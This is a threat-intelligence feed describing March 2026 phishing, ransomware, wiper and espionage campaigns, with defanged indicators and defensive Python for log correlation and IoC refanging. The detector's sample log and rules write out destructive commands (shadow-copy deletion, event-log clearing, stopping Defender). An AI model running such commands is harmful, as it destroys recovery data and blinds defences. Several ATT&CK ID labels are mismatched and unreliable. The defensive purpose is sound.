LIVE: Cyber Threat Intelligence Feed


This feed provides organizations with timely, actionable updates on the evolving cyber threat landscape. It highlights observed threat activity, indicators of compromise (IoCs), active campaigns, targeted sectors, and emerging vulnerabilities, along with recommended actions to help organizations proactively reduce risk. The intelligence is compiled and curated by Help AG’s CTI team using insights from internal monitoring, trusted partner sources, and industry threat and vulnerability feeds.

Threat Intel

Mar 18, 2026

Campaign: Phishing Campaign / Smishing (Fake Shipment Tracking)
IoC: posties[.]icu estafmox[.]help nrcsnap[.]com pkgov[.]shop
Campaign Scope: A large-scale phishing campaign uses fake shipment tracking SMS messages to exploit the widespread use of e-commerce and courier services. Attackers use spoofed sender identities or local-looking numbers to create urgency and lure victims into clicking malicious links leading to phishing pages designed to steal personal and financial data, including card details and one-time passwords. The campaign leverages real-time WebSocket connections for immediate data exfiltration and appears coordinated, using shared infrastructure, phishing templates, and phishing-as-a-service platforms to target multiple sectors across the MEA region.
Malware/Tools: Darcula Phishing Kit
Targeted Country: Middle East, Africa
Threat Actor: Unknown
Sector: Finance, Telecoms, eCommerce, Transport
MITRE ATT&CK Techniques: T1566.002; T1204; T1056; T1041
Threat Severity: High
Recommendation: Individuals should avoid clicking tracking links in SMS messages and instead visit official courier websites directly. Businesses should publish alerts about phishing campaigns, implement email authentication protocols (DMARC, DKIM, SPF), and partner with mobile carriers to filter fraudulent SMS messages. Regularly educate users about phishing tactics and promote a culture of security awareness. Implement multi-factor authentication wherever possible to add an extra layer of security.

Campaign: Ransomware Campaign / Double Extortion
IoC: 1ca67af90400ee6cbbd42175293274a0f5dc05315096cb2e214e4bfe12ffb71f e0fd8ff6d39e4c11bdaf860c35fd8dc0 51da4b9aa541a6fc636a97d44ee265b4 bed8d1752a12e5681412efbb8283910857f7c5c431c2d73f9bbc5b379047a316 f91cbdd91e2daab31b715ce3501f5ea0 payloadynyvabjacbun4uwhmxc7yvdzorycslzmnleguxjn7glahsvqd[.]onion payloadrz5yw227brtbvdqpnlhq3rdcdekdnn3rgucbcdeawq2v6vuyd[.]onion
Campaign Scope: The Payload ransomware group is targeting organizations across multiple sectors using a Babuk-derived ransomware with enhanced capabilities. The malware operates without command-and-control communication, encrypting files using Curve25519 and ChaCha20 while employing double extortion via Tor-based portals. It includes Windows and Linux/ESXi variants, enabling attacks on virtualized environments. The campaign leverages anti-forensic techniques such as disabling security services, deleting shadow copies, wiping logs, patching ETW, and self-deletion to evade detection and hinder recovery.
Malware/Tools: Payload Ransomware (Babuk-derived)
Targeted Country: Bahrain
Threat Actor: Payload Ransomware Group
Sector: Energy, Health, Telecoms, Agriculture
MITRE ATT&CK Techniques: T1486; T1490; T1562.001; T1070.001; T1070.004; T1489; T1057; T1083; T1027; T1106
Threat Severity: High
Recommendation: Organizations should prioritize robust backup and recovery solutions, implement multi-factor authentication, regularly patch systems, and monitor for unusual network activity. Focus on endpoint detection and response (EDR) solutions capable of detecting and blocking ransomware behavior. Employee security awareness training is crucial to prevent initial infection vectors like phishing.
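The recommendation above calls for EDR capable of detecting ransomware behaviour. As an added example (not code from the feed, from Help AG, or from any EDR vendor), the Python below correlates process-creation events for three of the anti-forensic actions the Payload entry lists, shadow copy deletion (T1490), event log clearing (T1070.001) and service stopping (T1489), and flags a host only when several distinct techniques appear, since any one of them on its own is common administrative noise. The log lines are constructed, and the rule set is an assumption modelled on common Sigma-style process-creation detections.

```python
"""Correlate anti-forensic process activity of the kind the Payload ransomware
entry describes (service disabling, shadow copy deletion, log wiping).

Added example; not code from the feed, Help AG, or any vendor. The log lines are
constructed, and the rule set is an assumption modelled on common Sigma-style
process-creation detections, tagged with the technique IDs the entry cites.
"""
import re
from collections import defaultdict

# Constructed process-creation events (one per line): timestamp, host, user, image, command line.
SAMPLE_LOG = r"""
2026-03-18T10:01:02Z host=WS01 user=alice image=C:\Windows\System32\vssadmin.exe cmd=vssadmin delete shadows /all /quiet
2026-03-18T10:01:05Z host=WS01 user=alice image=C:\Windows\System32\wevtutil.exe cmd=wevtutil cl Security
2026-03-18T10:01:09Z host=WS01 user=alice image=C:\Windows\System32\net.exe cmd=net stop WinDefend
2026-03-18T10:02:00Z host=SRV02 user=backup image=C:\Windows\System32\vssadmin.exe cmd=vssadmin list shadows
2026-03-18T10:03:00Z host=SRV03 user=svc image=C:\Windows\System32\net.exe cmd=net stop Spooler
""".strip().splitlines()

_EVENT = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)

# (technique ID from the feed entry, rule name, pattern applied to the lower-cased command line)
RULES = [
    ("T1490", "shadow copy deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows")),
    ("T1490", "shadow copy deletion via WMI", re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete")),
    ("T1490", "boot recovery disabled", re.compile(r"\bbcdedit(\.exe)?\b.*recoveryenabled\s+no")),
    ("T1070.001", "event log cleared", re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b")),
    ("T1489", "service stopped", re.compile(r"\b(net|sc)(\.exe)?\s+stop\s+\S+")),
]


def parse_event(line: str) -> dict:
    """Parse one constructed log line into a dict; raises ValueError on malformed input."""
    m = _EVENT.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    return m.groupdict()


def match_rules(cmd: str) -> list:
    """Return (technique, rule name) pairs whose pattern matches the command line."""
    lowered = cmd.lower()
    return [(tech, name) for tech, name, pat in RULES if pat.search(lowered)]


def correlate(lines) -> dict:
    """Group matched techniques per host: host -> {technique: [rule names]}."""
    per_host = defaultdict(lambda: defaultdict(list))
    for line in lines:
        ev = parse_event(line)
        for tech, name in match_rules(ev["cmd"]):
            per_host[ev["host"]][tech].append(name)
    return per_host


def flag_hosts(lines, min_techniques: int = 2) -> list:
    """Hosts showing at least `min_techniques` distinct anti-forensic techniques.

    A lone 'net stop' or a shadow-copy listing is routine admin noise; several
    distinct techniques on one host in quick succession is the ransomware pattern.
    Returns sorted (host, sorted technique IDs) pairs.
    """
    hits = correlate(lines)
    return sorted(
        (host, sorted(techs)) for host, techs in hits.items() if len(techs) >= min_techniques
    )


if __name__ == "__main__":
    for host, techs in flag_hosts(SAMPLE_LOG):
        print(f"{host}: {', '.join(techs)}")
```

With the constructed sample, only WS01 is flagged: SRV02 merely lists shadow copies and SRV03 stops a single unrelated service, so neither crosses the two-technique threshold. In production the same correlation would be keyed on a time window as well as the host, and the rule list would be extended to cover the ETW patching and self-deletion the entry also mentions.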

Mar 14, 2026

Campaign: Operation CamelClone – Cyber Espionage / Spear-Phishing Campaign
IoC: 31f1a97c72f596162f0946df74838d3bef89289ce630adba8791c0f3220980ee 51af876b0f7fde362c69219f7dec39f7fb667fb53dc5fe2cbdf841d6c5951460 27d7a398a58c12093bc49f7144dac2f079232768096d0558c226ea5c53782e29 4a0e2649f89e11121ffe55546ee081ac07472db650d094314414ebf26fcb7a8e 92962bfa6df48ec0f13713c437af021f4138dc5a419bc92bc8a376d625a6519a 1d0ea66d347325902e20a12e1f2f084be45d3d6045264e513dcc420b9928013c 2671e1f43b2e5911310c5b3f124c076055eec5dee4e596854332ffcf791fd740 2902cdee050a60c3129b4bb84e74ddda7b129c3473556f689d83609d9a5981a7 630ac67d8db777ae0b93e066bd13b21908e79f23a41a64448f0a4ea38c063a44 230a22a1f1800f11718b43a7ce9390d2ef0fa9dc212d954c8fafbfbe997bbbef 62c477c0827752ffeb8ea243497eef1c666fc41025d287909d021bceb5b8e699 2dcaaedfad798dad87f27aef39885d2879825c4c8bed1dcd9e863aba0d463103 hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/f[.]js hxxps://filebulldogs[.]com/uploads/OKW5RN48ZJ/f[.]js hxxps://filebulldogs[.]com/uploads/F1OQY9GU84/f[.]js hxxps://filebulldogs[.]com/uploads/82WX5GP8CI/f[.]js hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/document[.]pdf hxxps://filebulldogs[.]com/uploads/OKW5RN48ZJ/document[.]pdf hxxps://filebulldogs[.]com/uploads/F1OQY9GU84/document[.]pdf hxxps://filebulldogs[.]com/uploads/82WX5GP8CI/document[.]pdf hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/a[.]zip hxxps://filebulldogs[.]com/uploads/OKW5RN48ZJ/a[.]zip hxxps://filebulldogs[.]com/uploads/F1OQY9GU84/a[.]zip hxxps://filebulldogs[.]com/uploads/82WX5GP8CI/a[.]zip oliwiagibbons@onionmail[.]org theresaunderwood@onionmail[.]org keatonwalls@onionmail[.]org coreyroberson@onionmail[.]org
Campaign Scope: Spear-phishing emails deliver ZIP archives containing malicious LNK files impersonating official institutions. Executing the shortcut triggers PowerShell to download the HOPPINGANT JavaScript loader from file-sharing platforms. The loader retrieves additional payloads including decoy documents and archives containing Rclone, which connects to attacker-controlled MEGA cloud storage to exfiltrate sensitive files such as documents and Telegram session data. The campaign uses public file-sharing services instead of traditional C2 infrastructure to evade detection and conduct intelligence collection.
Malware/Tools: HOPPINGANT, Rclone
Targeted Country: Algeria, Ukraine, Kuwait
Threat Actor: Unknown (suspected intelligence-focused actors)
Sector: Government, Diplomacy
MITRE ATT&CK Techniques: T1566.001; T1204.002; T1059.001; T1059.007; T1027; T1218; T1071.001; T1105; T1005; T1213; T1567.002
Threat Severity: High
Recommendation: Implement robust email security and phishing detection; conduct user awareness training; regularly patch systems; deploy EDR solutions; enforce MFA; segment networks to limit lateral movement; monitor outbound connections and investigate anomalies.
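The IoC fields in this feed are defanged ([.] for dots, hxxp/hxxps for http/https) and mix hash, domain, URL, e-mail, IP and .onion values in one whitespace-separated string, which blocklists and SIEM queries cannot consume directly. The Python below is an added example (not code from the feed or from Help AG) that refangs and types such a field. The sample field is assembled from indicators printed in this feed, and the defanging and classification rules are assumptions based on the style of these entries.

```python
"""Refang and classify defanged indicators of the kind the feed's IoC fields carry.

Added example; not code from the feed or from Help AG. The sample field below is
assembled from indicators printed in this feed, and the defanging rules ([.] for
dots, hxxp/hxxps for http/https) are assumptions based on the entries' style.
"""
import re
from collections import defaultdict

# Defanging conventions observed in the feed (assumption: these are the only forms used).
_DEFANG = [
    (re.compile(r"\[\.\]"), "."),
    (re.compile(r"\[@\]"), "@"),
    (re.compile(r"^hxxp", re.IGNORECASE), "http"),
]

# Checked in order: the more specific shapes come first so that an .onion host
# is not reported as a plain domain and an IPv4 address is not mistaken for one.
_PATTERNS = [
    ("sha256", re.compile(r"^[0-9a-fA-F]{64}$")),
    ("md5", re.compile(r"^[0-9a-fA-F]{32}$")),
    ("url", re.compile(r"^https?://", re.IGNORECASE)),
    ("email", re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]+$")),
    ("ipv4", re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")),
    ("onion", re.compile(r"^[a-z2-7]{16,56}\.onion$", re.IGNORECASE)),
    ("domain", re.compile(r"^(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")),
]

# Constructed sample field, assembled from indicators printed in this feed
# (the repeated domain at the end exercises de-duplication).
SAMPLE_FIELD = (
    "1ca67af90400ee6cbbd42175293274a0f5dc05315096cb2e214e4bfe12ffb71f "
    "e0fd8ff6d39e4c11bdaf860c35fd8dc0 "
    "payloadynyvabjacbun4uwhmxc7yvdzorycslzmnleguxjn7glahsvqd[.]onion "
    "hxxps://filebulldogs[.]com/uploads/AVQB61TVOX/f[.]js "
    "oliwiagibbons@onionmail[.]org 82[.]25[.]35[.]25 posties[.]icu posties[.]icu"
)


def refang(token: str) -> str:
    """Reverse the feed's defanging so the value can go into a blocklist or query."""
    out = token
    for pattern, repl in _DEFANG:
        out = pattern.sub(repl, out)
    return out


def classify(value: str) -> str:
    """Return the indicator type of a refanged value, or 'unknown'."""
    for kind, pattern in _PATTERNS:
        if pattern.match(value):
            return kind
    return "unknown"


def parse_ioc_field(field: str) -> list:
    """Split a whitespace-separated IoC field into typed, refanged, de-duplicated records."""
    seen = set()
    records = []
    for token in field.split():
        # Some feed fields are wrapped in stray straight or curly quotes; drop them.
        token = token.strip('"\u201c\u201d')
        if not token:
            continue
        value = refang(token)
        if value in seen:
            continue
        seen.add(value)
        records.append({"raw": token, "value": value, "type": classify(value)})
    return records


def group_by_type(records) -> dict:
    """Bucket refanged values by indicator type, e.g. for per-type blocklist exports."""
    grouped = defaultdict(list)
    for rec in records:
        grouped[rec["type"]].append(rec["value"])
    return dict(grouped)


if __name__ == "__main__":
    for kind, values in sorted(group_by_type(parse_ioc_field(SAMPLE_FIELD)).items()):
        print(f"{kind}: {values}")
```

Anything typed `unknown` deserves a manual look before it goes into a blocklist; the point of typing first is that hashes, domains and URLs are pushed to different controls (EDR, DNS filtering, proxy) and should not be mixed in one list.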

Mar 13, 2026

Campaign: Handala Hack – Destructive Malware / Wiper Campaign
IoC: 5986ab04dd6b3d259935249741d3eff2 3cb9dea916432ffb8784ac36d1f2d3cd 82[.]25[.]35[.]25 31[.]57[.]35[.]223 107[.]189[.]19[.]52 146[.]185[.]219[.]235
Campaign Scope: Ongoing destructive intrusion campaign conducted by the Handala persona associated with the Void Manticore threat cluster. Operations rely on compromised VPN credentials and trusted service provider access to infiltrate victim environments, followed by reconnaissance, credential harvesting, and privilege escalation to Domain Administrator level. Lateral movement is conducted via RDP and tunneling tools, after which coordinated destructive actions are executed through custom wipers, PowerShell-based deletion scripts, encryption tools, and manual file destruction to maximize operational disruption and psychological impact through hack-and-leak propaganda.
Malware/Tools: Handala Wiper, NetBird, VeraCrypt
Targeted Country: N/A
Threat Actor: Void Manticore (aka Red Sandstorm / Banished Kitten) – persona: Handala
Sector: Government, Telecommunications, Technology, Critical Infrastructure
MITRE ATT&CK Techniques: T1133 – VPN Access; T1078.002 – Stolen Credentials; T1199 – Trusted Vendor Access; T1110 – Password Brute Force; T1003.001 – LSASS Credential Dumping; T1003.002 – SAM Credential Extraction; T1087.002 – Domain Account Discovery; T1021.001 – RDP Lateral Movement; T1572 – Network Tunneling; T1105 – Tool Downloading; T1047 – WMI Command Execution; T1484.001 – Group Policy Abuse; T1037.003 – Logon Script Execution; T1053.005 – Scheduled Task Execution; T1059.001 – PowerShell Execution; T1561.002 – Disk Wiping; T1485 – Data Destruction; T1486 – Disk Encryption Attack
Threat Severity: Critical
Recommendation: Enforce MFA for VPN and privileged accounts; monitor authentication logs for anomalous access; restrict RDP exposure; detect LSASS credential dumping attempts; monitor tunneling tools such as NetBird; restrict unauthorized encryption utilities; deploy strong endpoint detection; maintain secure offline backups and tested recovery procedures; conduct threat hunting for abnormal administrative activity and destructive file operations.

Mar 12, 2026

Campaign: Conflict-Themed Phishing Campaign – Cyber Espionage / Credential Harvesting
IoC: uzbembish@elcat[.]kg fed6ebb87f7388adf527076b07e81dfa432bac4e899b0d7af17b85cc0205ffad a9de383c6a1b00c9bd5a09ef87440d72ec7fc4bcd781207b3cace2f246788d4d dfaaaf75147afbd57844382c953ec7ef36f68a9c17c66a47a847279a6b1109c9 4b9661092051839496c04169ccb52b659c0f65cefd14a990e23565a0c0e8eeaf d518262dd687a48f273966853f3ed4eb7404eb918b165bb71ff83f75962c0104 b58ec14b0119182aef12d153280962ad76c30e3cd67533177d55481704eba705 7b6d69a249fe2adf43eefc31cdeca62cf48ab428fcbf199322feeb99d24fb001 a8acb9864e6f64323ed75e69038ca9bfe76f7b1b0d24ec7df8ac07b6dbd641a3 14efa1194cc4c6aa5585d63c032268794364123d41a01121cbd5e56f7c313399 support[.]almersalstore[.]com almersalstore[.]com ban[.]ali@mofa[.]gov[.]iq nqandeel04@gmail[.]com iwsmailserver[.]com maria[.]tomasik@denika[.]se unityprogressall[.]org war[.]analyse[.]ltd@outlook[.]com ali[.]mo@med[.]gov[.]sy hxxps://iran[.]dashboard[.]1drvms[.]store/errors/sessionerrors/expire?client= jscop[.]mea[.]gov[.]in@outlook[.]com hxxps://defenceprodindia[.]site/server[.]php?file=Reader_en_install defenceprodindia[.]site 9477d9cd1435dc465b4047745e9c71103a114d65ed0d5f02ac3c97ac3f1dbf47 a9f4f4bc12896d0f0d2eeff02dd3e3e1c1406d8a6d22d59aa85f151d806ba390 ea1d98a41ad9343d017fa72f4baeeca0daa688bec6e0508e266c5e37e9d330de McManus[.]Michael@hotmail[.]com hxxps://1drv[.]ms/b/c/cbec61ab8028f986/IQDa9igU3D3BRqiyNtth76AzAbOM6jUpa8apnuRl-zKXKow?e=E8bIfd 16db04b632668dae081359fc07c97e5a9b79dad61713642e48b494aa6b7828be transfergocompany[.]com
Campaign Scope: Multiple threat groups launched coordinated phishing campaigns targeting government and diplomatic organizations during heightened geopolitical tensions. The campaigns leveraged conflict-themed lures, compromised or spoofed government email accounts, and credential harvesting pages impersonating services such as Microsoft Outlook Web App and OneDrive. Malicious attachments containing LNK loaders triggered DLL sideloading to deploy Cobalt Strike beacons and .NET loaders delivering Rust-based backdoors. In several cases, attackers used geofencing, tracking pixels, and compromised infrastructure to improve targeting and campaign effectiveness.
Malware/Tools: Cobalt Strike, Rust Backdoor
Targeted Country: United States, India, Middle East, Europe
Threat Actor: TA453 (APT42 / Charming Kitten / Mint Sandstorm), TA402 (Frankenstein / Cruel Jackal), TA473 (Winter Vivern), UNK_InnerAmbush, UNK_RobotDreams, UNK_NightOwl
Sector: Government, Administration, Diplomacy
MITRE ATT&CK Techniques: T1566.002 – Phishing Link; T1566.001 – Phishing Attachment; T1566.003 – Phishing via Service; T1059.001 – PowerShell Execution; T1574.002 – DLL Side-Loading; T1105 – Payload Download; T1071.001 – Web C2 Communication; T1036 – Masquerading
Threat Severity: High
Recommendation: Implement robust email filtering and phishing detection controls; enforce MFA for all remote access and email services; conduct user awareness training to identify phishing attempts; monitor network traffic and authentication logs for suspicious activity; enforce strong password policies; regularly update systems and security software; review and test incident response plans; leverage threat intelligence feeds to track emerging indicators.

Mar 11, 2026

Campaign: Social Media Influence Operation – Information Manipulation / Psychological Influence
IoC: No technical IoCs reported. The activity involved coordinated fake Instagram personas and social media accounts used to establish contact with targets.
Campaign Scope: Coordinated influence operation using fake personas on Instagram to build relationships with users before introducing politically themed messaging. The operation relied on long-term social engineering tactics to gain trust and gradually influence public opinion. The campaign was identified and disrupted by Meta, which removed the associated accounts and content linked to the activity.
Malware/Tools: N/A
Targeted Country: United States
Threat Actor: Unknown state-linked influence operators
Sector: Political / Public Discourse
MITRE ATT&CK Techniques: T1562.001 – Identity Impersonation; T1598 – Social Engineering for Information; T1606.001 – Relationship-Based Phishing
Threat Severity: Medium
Recommendation: Exercise caution with unsolicited messages or connection requests on social media platforms; verify the authenticity of accounts before engaging; cross-check information shared online with trusted sources; enable multi-factor authentication for social media accounts; platforms should continue monitoring and removing coordinated inauthentic behavior and influence campaigns.

Campaign: Conflict-Driven Espionage Campaign – Cyber Espionage / Phishing Operations
IoC: No specific IoCs publicly disclosed in this advisory. Indicators referenced include phishing email infrastructure, malicious URLs, and file hashes associated with malware delivery observed across multiple campaigns.
Campaign Scope: Multiple threat actors increased cyber espionage activity targeting government and diplomatic entities during the regional conflict. Campaigns leveraged conflict-themed phishing emails, compromised accounts, and deceptive URLs to deliver malicious payloads and harvest credentials. Activity involved malicious attachments, compromised infrastructure, and impersonation of trusted services such as Microsoft Outlook Web App and OneDrive to gain initial access and collect intelligence from targeted networks.
Malware/Tools: Reader_en_install Loader, Malicious VLCMediaPlayer (masquerading payload)
Targeted Country: India, Iran, Syria, Iraq, Europe, Middle East
Threat Actor: TA453 (Charming Kitten), TA402 (Frankenstein), TA473 (Winter Vivern), UNK_InnerAmbush, UNK_RobotDreams, UNK_NightOwl
Sector: Government, Diplomacy
MITRE ATT&CK Techniques: T1566 – Phishing Emails; T1189 – Malicious Websites; T1078 – Compromised Accounts; T1190 – Web Application Exploitation; T1059 – Script Execution; T1204 – User Execution; T1555 – Credential Harvesting; T1105 – Payload Download; T1071 – Web-Based C2 Communication
Threat Severity: High
Recommendation: Deploy advanced email filtering and phishing detection controls; enforce MFA across remote access and email services; conduct user awareness training to identify conflict-themed phishing lures; monitor authentication logs and network traffic for anomalies; maintain strong password policies; regularly update security software; review and test incident response plans; leverage threat intelligence feeds to track emerging indicators and campaigns.

Campaign: Operation Rising Lion – Psychological Cyber Warfare / Social Engineering Campaign
IoC: No technical IoCs publicly reported. Activity involves spoofed phone calls impersonating the Israel Defense Forces Home Front Command number and fraudulent SMS messages mimicking the official OREFAlert emergency alert system.
Campaign Scope: Psychological influence campaign using spoofed emergency alerts and social engineering to create panic and erode trust in official warning systems. Attackers distributed fake emergency calls and SMS alerts warning of missile attacks or fuel shortages to manipulate civilian responses during conflict conditions. The activity forms part of broader hybrid operations combining cyber activity with psychological influence and targeted phishing attempts against key individuals and institutions.
Malware/Tools: N/A
Targeted Country: Israel
Threat Actor: State-linked influence operators
Sector: Government, Civilian
MITRE ATT&CK Techniques: T1566 – Targeted Phishing; T1598 – Social Engineering for Information; T1195 – Supply Chain Trust Abuse; T1270 – Psychological Operations
Threat Severity: High
Recommendation: Verify emergency alerts and communications through official government channels or verified applications; avoid acting on unsolicited emergency messages; organizations should implement verification procedures for critical communications; conduct awareness training on social engineering tactics; monitor for suspicious messaging campaigns during crisis situations.

Campaign: State-Linked Cybercrime Integration – Ransomware & Infostealer Operations
IoC: 077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d 94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb a8c380b57cb7c381ca6ba845bd7af7333f52ee4dc4e935e98b48bb81facad72b 24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f
Campaign Scope: Threat actors associated with state-linked cyber operations are increasingly leveraging the cybercrime ecosystem to support intelligence collection and disruptive campaigns. Groups such as Void Manticore (Handala) and MuddyWater have been observed using commercially available malware, botnets, loaders, and ransomware infrastructure typically associated with financially motivated cybercrime. The activity demonstrates a convergence between state-sponsored operations and criminal tooling, enabling actors to improve operational effectiveness, obscure attribution, and conduct targeted attacks aligned with strategic objectives.
Malware/Tools: Rhadamanthys Infostealer, Tsundere / DinDoor Botnet, CastleLoader, FakeSet, StageComp, Qilin Ransomware
Targeted Country: Israel
Threat Actor: Void Manticore (Handala), MuddyWater
Sector: Health, Defense, Energy, IT, Telecommunications, Government
MITRE ATT&CK Techniques: T1566.001 – Phishing Attachment; T1566.002 – Phishing Link; T1588.001 – Malware Acquisition; T1588.002 – Tool Acquisition; T1071 – Web-based Communication; T1486 – Ransomware Encryption
Threat Severity: High
Recommendation: Conduct proactive threat hunting for known indicators; deploy strong endpoint detection and response (EDR); implement network segmentation and MFA; monitor network traffic and authentication logs for suspicious activity; restrict execution of unauthorized software through application control; enhance user awareness training for phishing threats; regularly review security policies and incident response procedures.

Campaign: APT Intrusion Campaign – Critical Infrastructure Targeting
IoC: No specific IoCs publicly reported in this advisory.
Campaign Scope: Reported cyber intrusions targeting critical infrastructure organizations including a U.S. airport, a financial institution, and a software company. The activity is attributed to an advanced persistent threat (APT) group conducting operations aimed at operational disruption and intelligence collection. While technical details regarding malware or intrusion techniques remain limited, the targeting pattern indicates sustained pressure on high-value organizations during heightened geopolitical tensions.
Malware/Tools: N/A
Targeted Country: United States
Threat Actor: State-linked APT group (not publicly identified)
Sector: Finance, IT, Transportation
MITRE ATT&CK Techniques: T1190 – External Service Exploitation; T1078 – Stolen Account Access; T1133 – Remote Access Abuse
Threat Severity: High
Recommendation: Implement strong network segmentation to limit lateral movement; enforce multi-factor authentication for all remote access and privileged accounts; conduct regular vulnerability assessments and penetration testing; monitor network and authentication logs for anomalous activity; perform proactive threat hunting; ensure incident response plans are updated and regularly tested.

Mar 10, 2026

Campaign: State-Linked Cybercrime Integration – Ransomware & Infostealer Operations
IoC: No specific IoCs publicly reported in this advisory.
Campaign Scope: Security researchers report increased collaboration between state-linked cyber actors and cybercriminal ecosystems. The activity involves leveraging ransomware-as-a-service (RaaS), infostealers, and malware-as-a-service (MaaS) platforms to support intelligence collection, disruptive operations, and attribution evasion. Rather than using cybercrime purely as a cover, the actors are integrating criminal infrastructure, tools, and affiliate networks into state-aligned cyber operations to expand capabilities and operational reach.
Malware/Tools: Ransomware variants, Infostealers, Malware-as-a-Service platforms
Targeted Country: N/A
Threat Actor: State-linked cyber actors
Sector: Multi-sector (potentially government, enterprise, and infrastructure targets)
MITRE ATT&CK Techniques: T1566.001 – Phishing Attachment; T1078.004 – Compromised Account Access; T1486 – Ransomware Encryption
Threat Severity: High
Recommendation: Strengthen threat detection and monitoring capabilities to identify activity associated with criminal tooling; enforce multi-factor authentication and strong credential policies; apply regular patching and system updates; conduct security awareness training focused on phishing and social engineering; implement network segmentation and least privilege access controls; share threat intelligence to improve collective defense.

Campaign: State-Linked Cybercrime Integration – Use of Criminal Infrastructure
IoC: No specific IoCs publicly reported in this advisory. Indicators referenced include shared malware infrastructure, code-signing certificates, and tools used across multiple campaigns.
Campaign Scope: Threat actors associated with state-linked operations are increasingly leveraging cybercrime ecosystems to support state-directed cyber operations. Groups such as Void Manticore (Handala) and MuddyWater have been observed using commercially available malware, botnets, loaders, and ransomware infrastructure typically associated with financially motivated cybercrime. The integration of criminal services such as ransomware-as-a-service and infostealers allows these actors to enhance operational capability, obscure attribution, and conduct targeted operations against strategic organizations, including healthcare and government institutions.
Malware/Tools: Rhadamanthys Infostealer, Tsundere / DinDoor Botnet, CastleLoader, FakeSet, StageComp, Qilin Ransomware
Targeted Country: Israel, Albania
Threat Actor: Void Manticore (Handala), MuddyWater
Sector: Healthcare, Government, Defense
MITRE ATT&CK Techniques: T1566 – Phishing Emails; T1078 – Stolen Account Access; T1105 – Malware Download; T1059 – Script Execution; T1204 – User Execution; T1547 – Persistence Mechanism; T1027 – Obfuscated Malware; T1133 – Remote Access Abuse; T1555 – Credential Theft
Threat Severity: High
Recommendation: Conduct proactive threat hunting for indicators related to known malware families; deploy strong endpoint detection and response (EDR); enforce multi-factor authentication and network segmentation; monitor network traffic and authentication logs for anomalies; restrict execution of unauthorized software through application control; strengthen user awareness training against phishing; maintain updated security policies and incident response procedures.

Campaign: Telegram Hacktivist Activity Timeline – Coordinated Hacktivism / Multi-Vector Cyber Activity
IoC: No specific IoCs publicly reported in this advisory. Activity primarily coordinated through Telegram channels used by hacktivist groups to claim attacks and share operational updates.
Campaign Scope: Coordinated hacktivist activity emerging during the Iran–Israel–US conflict beginning March 2026. Multiple groups formed alliances and claimed attacks targeting government portals, financial services, energy infrastructure, aviation services, healthcare institutions, and educational organizations. Operations included DDoS attacks, attempted data breaches, ransomware activity, website exploitation, and alleged operational technology (OT) intrusions. The campaign expanded geographically across the Middle East, Europe, and allied regions, demonstrating an increase in politically motivated cyber operations and hacktivist coordination through messaging platforms.
Malware/Tools: DDoS tools, ransomware variants (unspecified)
Targeted Country: Israel, United States, Kuwait, Jordan, Saudi Arabia, UAE, Cyprus, UK
Threat Actor: Cyber Islamic Resistance, 313 Team, Keymous Plus, NoName057(16), DieNet, Nation of Saviors, Team Fearless, Cyb3rDrag0nz, Moroccan Black Cyber Army
Sector: Finance, Government, Energy, Aviation, Healthcare, Education, Defense
MITRE ATT&CK Techniques: T1499 – DDoS Service Disruption; T1566 – Phishing Initial Access; T1190 – Web Application Exploitation; T1486 – Ransomware Encryption; T1560 – Data Exfiltration Archives; T1189 – Drive-by Compromise
Threat Severity: High
Recommendation: Implement strong DDoS mitigation strategies and web application protections; monitor critical infrastructure systems for suspicious activity; patch exposed public-facing services; deploy strong access controls and continuous monitoring; conduct proactive threat hunting and vulnerability management; monitor for potential data exfiltration and misinformation campaigns; participate in threat intelligence sharing initiatives to track evolving hacktivist activity.

Campaign: State Cyber Strategy – Offensive Cyber Planning
IoC: No technical IoCs reported.
Campaign Scope: Strategic policy shift outlining expanded offensive cyber capabilities and defensive resilience measures in response to escalating geopolitical tensions. The strategy focuses on disrupting adversarial networks before breaches occur, strengthening critical infrastructure protection, implementing zero trust architecture across federal systems, enhancing encryption standards, and increasing collaboration with private sector cybersecurity providers. It also emphasizes investments in emerging technologies such as AI and post-quantum cryptography while preparing cyber operations to play a central role in modern geopolitical conflict.
Malware/Tools: N/A
Targeted Country: United States, Israel, Iran
Threat Actor: (External) Government-led cyber strategy
Sector: Energy, Finance, IT, Healthcare, Utilities
MITRE ATT&CK Techniques: T1562.001 – Defense Evasion / Security Hardening Context
Threat Severity: Medium
Recommendation: Implement zero trust architecture across critical systems; strengthen encryption and identity security controls; improve public-private cyber defense collaboration; enhance continuous monitoring and threat intelligence sharing; invest in workforce development and incident response capabilities to strengthen organizational cyber resilience.

Campaign: BoryptGrab Campaign – Multi-Stage Infostealer / Credential Theft
